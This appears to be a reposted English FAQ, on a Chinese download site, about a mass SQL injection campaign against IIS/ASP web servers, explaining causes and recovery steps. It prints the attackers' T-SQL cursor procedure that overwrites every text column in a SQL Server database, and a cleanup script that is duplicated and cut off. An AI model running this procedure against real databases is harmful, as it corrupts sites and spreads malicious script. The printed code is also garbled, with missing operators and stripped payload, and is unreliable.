外国的注入技巧收集
The attack is targeting Microsoft IIS web servers. Is it exploiting a Microsoft vulnerability?
Yes and no. Web developers (or their employers who did not mandate proper security education) are to blame for each single infection, because the SQL injection exploited to infect the web sites is possible thanks to trivial coding errors.
That said, the attackers are targeting IIS web servers which run ASP for a reason.
Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL Server database in a generic way, with no need of knowing the specific table and fields layouts:
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' @T '] set [' @C '] =
rtrim(convert(varchar,[' @C ']))
'''''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
This is the “secret sauce” which is allowing the attack to reach its impressive numbers, and it works exclusively against Microsoft database technology — but it’s a feature, not a bug (no irony intended this time). Anyway, the chances for such “powerful” DB technology of being used in conjunction with web servers different than IIS are very low.
So, to recap:
There’s no Microsoft-specific vulnerability involved: SQL injections can happpen (and do happen) on LAMP and other web application stacks as well.
SQL injections, and therefore these infections, are caused by poor coding practices during web site development.
Nonetheless, this mass automated epidemic is due to specific features of Microsoft databases, allowing the exploit code to be generic, rather than tailored for each single web site. Update: more details in this comment.
In my previous coverage of similar incidents I also assumed a statistical/demographic reason for targeting IIS, since many ASP developers having a desktop Visual Basic background underwent a pretty traumatic migration to the web in the late 90s, and often didn’t really grow enough security awareness to develop safe internet-facing applications.
What should I do if I’m the administrator of an infected site?
First of all, you should call your web developers (or even better, someone who specializes in web application security) and require a full code review to find and fix the SQL injection bugs.
In the meanwhile you should either put your database offline or recover clean data from a backup, but until the code review is done be prepared to get compromised again. Deploying a web application firewall may mitigate the emergency, but you must understood it’s a merely temporary work-around — the solution is fixing the code (learn from the United Nations tale).
If you’ve got no clean database backup, you could try to recover by brutally reversing the SQL attack:
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' @T '] set [' @C '] = left(
convert(varchar(8000), [' @C ']),
len(convert(varchar(8000), [' @C '])) - 6 -
patindex(''%tpircs<%'',
reverse(convert(varchar(8000), [' @C '])))
)
where [' @C '] like ''%'''
);
it locates and removes it with
EXEC(
'update [' @T '] set [' @C '] = left(
convert(varchar(8000), [' @C ']),
len(convert(varchar(8000), [' @C '])) - 6 -
patindex(''%tpircs<%'',
reverse(convert(varchar(8000), [' @C '])))
)
where [' @C '] like ''%
热门文章
常用系统
- 1番茄花园 Ghost XP SP3 海量驱动装机版 2022年1月 ISO镜像高速下载
- 2番茄花园Ghost Win7 x64 SP1稳定装机版2021年3月(64位) 高速下载
- 3雨林木风Ghost Win8.1 (X64) 极速纯净版2020年7月免激活) ISO镜像高速下载
- 4深度技术 Windows 10 x86 企业版 电脑城装机版2018年10月(32位) ISO镜像免费下载
- 5深度技术 Windows 10 x86 企业版 电脑城装机版 版本1903 2021年11月(32位) ISO镜像免费下载
- 6新萝卜家园电脑城专用系统 Windows10 x64 企业版 版本1903 2021年4月(64位) ISO镜像免费下载
- 7雨林木风 Ghost Win7 SP1 新春特别 装机版 2020年2月(32位) 提供下载
- 8笔记本&台式机专用系统 Windows10 中秋特别 企业版 2020年9月(64位) 提供下载
- 9电脑公司Ghost Win8.1 x32 喜迎国庆 精选纯净版2021年10月(免激活) ISO镜像高速下载
- 10雨林木风系统 Ghost XP SP3 装机版 YN2020年7月 ISO镜像高速下载